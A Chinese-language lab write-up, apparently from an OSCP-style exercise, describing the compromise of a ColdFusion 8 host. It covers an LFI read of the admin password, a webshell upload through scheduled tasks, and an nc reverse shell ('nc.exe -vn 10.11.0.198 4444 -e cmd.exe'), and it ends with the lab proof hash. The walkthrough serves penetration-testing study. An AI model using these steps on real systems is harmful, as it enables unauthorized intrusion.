nmap扫描结果

只对外开放了80端口

Nikto -h 10.11.1.10扫描一下

发现存在Adobe coldfusion8

coldfusion 存在lfi漏洞,可以直接读取到管理员密码。

admin:pass123

发现可以通过计划任务的方式,上传特定的文件到web目录内。似乎只可以上传cfm格式的

谷歌发现存在相应的cfm木马 cfexec-with-upload

下载之后通过计划任务上传到web目录

记得一定勾选上Save output to a file!!!.

输入cfm木马地址,并访问

上传nc

注意cfexec.cfm这个木马是规定了上传的文件都是上传到C:\目录下的!浪费了好多时间就是因为没有仔细看cfm源码!

上传完成之后

先在攻击机上开一个监听端口,再在

Command输入 C:\nc.exe

Option输入  -vn 10.11.0.198 4444 -e cmd.exe

反弹自己的cmd shell给攻击机

成功GET SHELL!

proof.txt a416a831fddf36aa8c01ba0674ca7bf8

彩蛋:

I did try hard  :)